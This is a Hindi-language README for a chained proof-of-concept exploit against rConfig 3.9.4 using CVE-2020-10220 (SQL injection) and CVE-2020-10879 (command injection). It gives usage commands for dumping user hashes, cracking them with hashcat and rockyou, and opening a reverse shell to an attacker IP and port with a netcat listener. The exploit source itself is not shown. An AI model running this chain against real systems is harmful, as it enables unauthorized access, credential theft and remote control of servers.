
rConfig के लिए संयुक्त PoCs: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879)
यह PoC rConfig संस्करण 3.9.4 को लक्षित करता है और SQL इंजेक्शन और रिमोट कमांड इंजेक्शन कमजोरियों के संयोजन के माध्यम से शोषण प्रदर्शित करता है। यह निम्नलिखित प्रक्रिया को स्वचालित करता है:
rockyou शब्दसूची और best64.rules के साथ पासवर्ड हैश को क्रैक करने का प्रयासयह स्क्रिप्ट दो मूल PoCs पर आधारित है और उन्हें जोड़ती है:
इसे क्रैकिंग और वैकल्पिक शेल स्पॉनिंग को स्वचालित करने के लिए संशोधित किया गया था।
requests लाइब्रेरी (pip install requests)hashcat स्थापित और कमांड लाइन के माध्यम से सुलभrockyou.txt शब्दसूची (या समतुल्य) जो /usr/share/wordlists/rockyou.txt पर स्थित है/usr/share/hashcat/rules/best64.ruleकेवल उपयोगकर्ताओं और हैश डंप करने के लिए:
python3 rConfig_rce.py https://target
उपयोगकर्ताओं को डंप करने, पासवर्ड क्रैक करने, और RCE का प्रयास करने के लिए (रिवर्स शेल के लिए हमलावर IP और पोर्ट की आवश्यकता है):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin खाते का उपयोग करने को प्राथमिकता देती है।nc -lvnp 80) चल रहा है।यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत उपयोग अवैध और अनैतिक है।